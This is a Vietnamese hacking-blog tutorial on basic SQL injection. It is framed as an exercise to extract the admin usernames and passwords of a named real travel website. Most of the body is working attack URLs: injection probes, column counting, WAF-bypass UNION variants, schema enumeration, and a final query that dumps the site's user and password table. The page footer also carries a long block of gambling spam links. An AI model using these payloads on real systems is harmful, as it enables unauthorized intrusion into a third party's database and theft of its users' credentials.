• Kiến thức
  • Network
  • Security
  • Software
  • Thủ thuật
  • Tin học văn phòng
  • Tin tức
  • Mail ảo tạm thời miễn phí
  • Tools tra cứu thông tin
  • Công cụ đổi số thành chữ
AnonyViet
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
AnonyViet
No Result
View All Result

SQLi cơ bản dành cho newbie

AnonyViet by AnonyViet
10/12/2015 - Updated on 16/12/2020
in SQL Injection
A A
3

Đề bài là hãy show user và pass của victim : canthotravel.vn bắt đầu nào
Step 1 : Thêm ‘ để kiểm tra xem site đó trả về như thế nào . ngoài cách thêm ‘ ta còn có thể sử dụng các cách khác như

📢 Tham gia kênh Telegram của AnonyViet
👉 Vào Telegram AnonyViet
Cập nhật bài mới, tools hay và thủ thuật IT nhanh nhất
PHP:
And 1=0
And 1=1
"
')
")

 

Các bài viết liên quan

Danh sách Payload SQL Injection 4

Danh sách Payload SQL Injection

09/09/2023 - Updated on 24/07/2025
sqlmap nang cao

Cách sử dụng SQLMap nâng cao

01/05/2023 - Updated on 24/07/2025
Cách dùng Burp Suite khai thác SQL Injection 5

Cách dùng Burp Suite khai thác SQL Injection

05/11/2022 - Updated on 24/07/2025
Hướng dẫn khai thác lỗi SQL Injection cơ bản 6

Hướng dẫn khai thác lỗi SQL Injection cơ bản

29/07/2022 - Updated on 24/07/2025

Ví dụ thực thế vào victim

PHP:
http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=1387986664'
http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=1387986664')
http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=1387986664+and+1=0--+

 

Sau khi đã kiểm tra xong ta xác định site này dính lỗi SQLi vì nó bị mất hết nội dung
Step 2 : Ta lại tiếp tục kiếm các cột của nó có 2 cách để tìm được cột nó bằng

PHP:
ORDER BY 1-- -
GROUP BY 1-- -

 

Nó cũng khá là dễ nên không nói sâu vào

PHP:
http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=1387986664+order+by+10--+

http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=1387986664+order+by+50--+

http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=1387986664+order+by+1000--+

 

Tại sao lạ thế ta đã thử hết mà nó cũng không ra cột lỗi ta thử xét truy vấn đầu vào thêm ‘ sau id xem nào

PHP:
http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=1387986664%27+order+by+10--+

http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=1387986664%27+order+by+6--+

http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=1387986664%27+order+by+5--+

 

Cột lỗi đã xuất hiện cột lỗi là 5
Step 3 : Ta tiếp tục dùng lệnh UNION SELECT để khai thác nó site này mình check thử trước rồi không cần phải bypass nhưng đối với 1 vài site khác cần bypass đoạn này thì các bạn cứ áp dụng các cách bypass 403 404

PHP:
/*!UNION*/ SELECT
/*!UNION SELECT */
UNION /*!SELECT */
/*!50000UNION*/ /*!50000SELECT */
UnIoN SeLeCT
UNION /*!50000SELECT*/

 

Còn nhiều nữa nhưng bạn cứ thử các cách trên là để bypass cơ bản nhất tiếp tục nào

PHP:
http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=1387986664%27+union+select+1,2,3,4,5--+

 

Vẫn không xuất hiện gì bây giờ ta cũng có 2 cách 1 là ta thêm – trước id= ví dụ id=-1 cách 2 là ta thay thế id= là NULL ví dụ id=NULL

PHP:
http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=-1387986664%27+union+select+1,2,3,4,5--+
http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=NULL%27+union+select+1,2,3,4,5--+

 

Số xuất hiện là 2 và 4 ở đây tôi chọn số 4
Step 4 : Bây giờ tới đây ta chèn vào ngay vị trí của số 4 như sau

GROUP_CONCAT(TABLE_NAME)

và sau cùng ta thêm

FROM information_tables WHERE table_schema=database()– –

để có thể khai thác được table name của web đó

PHP:
http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=NULL%27+union+select+1,2,3,GROUP_CONCAT(TABLE_NAME),5+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--+

 

Phù lúc này ta có được các table sau

binhluan,category,categoryl,cauhinh,cauhinhsanpham,chitietdatphong,chitietdatthucdon,chucnang,configmail,ctydulich,danhgiadoanhnghiep,datphong,dattours,feedrss,help,hinhthucdongia,hoidap,hotrott,huyen,huyenl,infoweb,khachhang,khachsan,khachsanl,khuvuc,khuyenmai,languages,lienhe,lkweb,loaihinhdulich,loaihinhdulichl,loaiphong,loaiphongl,loaiphongt,loaiphongtt,loaitin,loaitinl,loaitour,media,nhomtin,nhomtinl,noinhan,product,productl,quangcao,quanly,quocgia,sec_audit_fld,sec_audit_logon_errors,sec_audit_session,sec_audit_transaction,sec_host,sec_language,sec_module,sec_module_form,sec_module_list,sec_page,sec_role,sec_role_task,sec_session,sec_site,sec_site_language,sec_site_them,sec_system,sec_system_host,sec_task,sec_trans_cat,sec_trans_unit,sec_user,sec_vfs,sec_vfs_data,site_counter,support_online,support_online_group,thanhvien,thucdon,tieuchuan,tieuchuanl,tinh,tinhl,tinnhan,tintuc,tintucl,tours,toursl,trangthai,yeucaukhac

Chà khá là nhiều ta không quan tâm đề kêu là kiếm admin ta xem sơ qua và thấy sec_user ta chọn table này và tiếp tục khai thác nó
Step 5 : Ta sử dụng query cũng giông như step 4 nhưng ta lại thay đổi chữ table_name thành column_name và table_schema=database thành table_name=Mã hex table

GROUP_CONCAT(COLUMN_NAME)
FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=MÃ HEX TABLE

Mã hex table có nghĩ là bạn phải hex cái table mà bạn chọn có nhiều website hỗ trợ tính năng hex thậm chí ngay cả firefox bạn cũng có thể web hỗ trợ

http://www.convertstring.com/vi/EncodeDecode/HexEncode

Ở đây ta chọn table sec_user nên hex nó => 0x7365635f75736572 nhớ phải thêm 0x trước mã hex
câu lênh hoàn chỉnh

PHP:
http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=NULL%27+union+select+1,2,3,GROUP_CONCAT(COLUMN_NAME),5+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x7365635f75736572--+

 

kết quả nhận được là

user_id,username,role_id,user_code,user_password,salt,algorithm,firstname,lastname,email,phone,user_desc,created_by,created_at,updated_at,updated_by,ip_address,start_date,end_date,login_date,login_time,pwd_chg_date,pwd_chg_time,pwd_count,in_use,is_active,company_id

Step 6 : Ok đã có đầy đủ .. Table : Sec_user ; data column là : username và user_password ta tiến hành bước cuối nào

GROUP_CONCAT(USERNAME,0X7C,USER_PASSWORD)
+FROM+sec_user–+

áp dụng vào site

PHP:
http://www.canthotravel.vn/bs/index.php?mod=tintuc&id=null%27+union+select+1,2,3,group_concat(username,0x7c,user_password),5+from+sec_user--+

 

Hehe xong bài :) Cảm ơn các bạn đã xem

Tags: sql injectionsqli
AnonyViet

AnonyViet

20 năm kinh nghiệm trong lĩnh vực Security, các chứng chỉ:OSCP, CCNA, CCNP, CISSP. Kiến thức như một ngọn lửa, càng chia sẽ nó sẽ càng bùng cháy!

Related Posts

Danh sách Payload SQL Injection 7
SQL Injection

Danh sách Payload SQL Injection

09/09/2023 - Updated on 24/07/2025
sqlmap nang cao
Basic Hacking

Cách sử dụng SQLMap nâng cao

01/05/2023 - Updated on 24/07/2025
Cách dùng Burp Suite khai thác SQL Injection 8
SQL Injection

Cách dùng Burp Suite khai thác SQL Injection

05/11/2022 - Updated on 24/07/2025
Hướng dẫn khai thác lỗi SQL Injection cơ bản 9
Basic Hacking

Hướng dẫn khai thác lỗi SQL Injection cơ bản

29/07/2022 - Updated on 24/07/2025
sql injection shell
SQL Injection

Sử dụng SQL Injection để chạy lệnh và chiếm quyền Shell

30/03/2022 - Updated on 25/07/2025
sql injection
Code

SQL Injection là gì? Làm thế nào để ngăn chặn lỗ hổng SQL Injection

16/05/2021 - Updated on 24/07/2025
guest

guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

3 Comments
oldest
newest
Lâm Trung Tính
Lâm Trung Tính
9 years ago

Mình vào web mà soa nó cứ báo là ”Làm ơn hãy bật JavaSqrit” là sao ad

Reply
Lâm Trung Tính
Lâm Trung Tính
9 years ago

Bài viết này rất có ích cho newbie thanks ad rất nhiều :V

Reply
Hisoka
Hisoka
9 years ago

Yêu đấy :3

Reply
wpdiscuz   wpDiscuz

Liên hệ Quảng Cáo

Lien he AnonyViet

Bài viết mới

Cách đăng xuất Gmail trên điện thoại Huawei đơn giản nhất 1

Cách đăng xuất Gmail trên điện thoại Huawei đơn giản nhất

by AnonyViet
05/07/2026
0

Smart Game Booster VIP

Nhận bản quyền Smart Game Booster VIP 6 tháng miễn phí

by Thanh Kim
05/07/2026
0

tool kiểm tra bản quyền phần mềm

Windows True License: Tool kiểm tra bản quyền phần mềm cực hay

by Thanh Kim
04/07/2026
0

Đánh giá Samsung Galaxy A27 5G: Giống hệt Galaxy A36? 2

Đánh giá Samsung Galaxy A27 5G: Giống hệt Galaxy A36?

by AnonyViet
03/07/2026
0

Bình luận gần đây

  • Thái trong Hướng dẫn cách nhận 200GB MultCloud miễn phí mới nhất 2026
  • hiupc trong Hướng dẫn cách nhận Google AI Pro 1 năm miễn phí cho tài khoản mới
  • Linh trong Cách hoàn thuế TNCN không cần chứng từ trên eTax Mobile
  • Phuong trong Share key bản quyền IObit Uninstaller 15 PRO miễn phí 2026
  • AnonyViet trong Share key Driver Booster 13 Pro miễn phí 2026
  • adasdav trong Share key Driver Booster 13 Pro miễn phí 2026
  • thanhlong trong EaseUS Data Recovery Wizard – khôi phục dữ liệu đã mất !
  • 45555 trong Trang web tra lịch thi đấu World Cup 2026 trực quan, đồng bộ lịch tự động
  • Dương HỒng Tỷ trong Cách sử dụng sách giáo khoa online miễn phí từ lớp 1 đến lớp 12
  • well trong Hướng dẫn cách nhận Google AI Pro 1 năm miễn phí cho tài khoản mới
  • sang trong Share key Driver Booster 13 Pro miễn phí 2026
  • Dung trong Cách Active Key Sublime Text 4 – Tải Sublime Text 4 Full Key
  • việt trong Hướng dẫn nhận Lovable Pro 12 tháng miễn phí
  • AnonyViet trong Cách tạo ảnh Tốt nghiệp mầm non cho bé đẹp như Studio
  • việt trong Cách tạo ảnh Tốt nghiệp mầm non cho bé đẹp như Studio
  • AnonyViet trong Tool gỡ key phần mềm lậu hàng loạt để tránh bị phạt
  • Aboyit trong Tool gỡ key phần mềm lậu hàng loạt để tránh bị phạt
  • iraq trong Share key Driver Booster 13 Pro miễn phí 2026
  • tu an trong Share key Driver Booster 13 Pro miễn phí 2026
  • Huy dấu tên trong SafeKid – Tiện ích chặn video AI, giúp trẻ xem YouTube an toàn

Giới thiệu

AnonyViet

AnonyViet

Nơi chia sẻ những kiến thức mà bạn chưa từng được học trên ghế nhà trường!

Chúng tôi sẵn sàng đón những ý kiến đóng góp, cũng như bài viết của các bạn gửi đến AnonyViet.

Hãy cùng AnonyViet xây dựng một cộng đồng CNTT lớn mạnh nhất!

Giới thiệu

AnonyViet là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. AnonyViet cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Liên hệ

Email: support[@]anonyviet.com

1409 Hill Street #01-01A
Old Hill Street Police Station
Singapore 179369

 

DMCA.com Protection Status

kết quả xổ số hôm nay 33win Ae888 kubet kubet 8kbet 99ok trang chủ sc88 xin88 good88 kubet fm88 kubet thailand vip66 xoso66 https://tp88fun.com/ hello88 qq88 Vip66 hitclub bong99 XOSO66 new882.info Thabet fun88 nhà cái uy tín sunwin sunwin rikvip hitclub sunwin go88 12bet v9bet betvisa betvisa vin777 vin777 ee88 bet88 abc8 c54 https://keonhacai.fund/ sunwin Xoso66 58win fun88.supply https://fun88.supply/ F8BET80 u888 W88 link https://bbet88b.com/ OK9 vswin https://nowgoal.ws/ https://tylekeonhacai.me/ https://keonhacai.org.vc/ https://xx88.ac/ https://xx88.asia/ 789f NOHU HITCLUB Sunwin 58WIN MV88 888NEW AZ888 TD88 12bet v9bet vip66 7mcn hm88 DA88 9BET LC88 Game https://go8.red/ Go88 https://bancadoithuong.codes/ https://danhdeonline.blog/ Xocdia88 https://nhacaiuytin10.uk.com/ https://keonhacai88.tv/ https://keonhacai.loans/ https://gamebaidoithuong.io/ https://keonhacai.kiwi/ 789club Sun52 kjc nhà cái MB66 Thabet sun win luck8 https://devmarks.io V9bet Jun88 https://keonhacaitop.com/ hytw3339 Kết quả bóng đá xoso66 https://kjcgaming.com/ go88 F168 kèo nhà cái game nổ hũ tỷ lệ nhà cái https://sunwin.guru/ https://go88.baby/ https://hitclub.cab/ https://iwin.page/ https://b52.you/ https://789club-ceo.net/ https://manclub99.com/ https://choigamebai.org/ https://keonhacai95.com/ nổ hũ uy tín F168 https://kjcgaming.com/ 12bet 12bet nhà cái F168 8day WIN678 6789 kv999 F168 F168 https://sc88.market/ TẢI SUNWIN https://sc88.plus/ https://gmnc.club/ vip88 99ok 8kbet SHBET https://fly88h.com/ https://sunwinn.band/ https://keonhacai55.de/ https://keonhacai55.bet/ 7mcn rikvip sunwin keonhacai5 ok 8386 trang chủ MB66 https://xx88.center/ KK55 Hoiquantv Hoiquantv Hoiquantv thapcamtv live thapcamtv live 90phut tiengruoi luongsontv luongsontv xx88 789club Jun88 888slot Hm88 TG88 TR88 AF88 58WIN JBO go88 Rikvip Bắn cá đổi thưởng Good88 https://zonic.sa.com/ Bong88 Game bài đổi thưởng Vn88 F 168 SH BET Xoilac TV bóng đá trực tiếp bóng đá trực tiếp cakhia tv trực tiếp bóng đá tối nay SKY88 Debet 12bet 12bet https://vaoroitv.app/ https://mitomtv.me/ xoso66 Fun88 33win game bài kèo nhà cái

©2026 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về CNTT

No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC

©2026 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về CNTT

wpDiscuz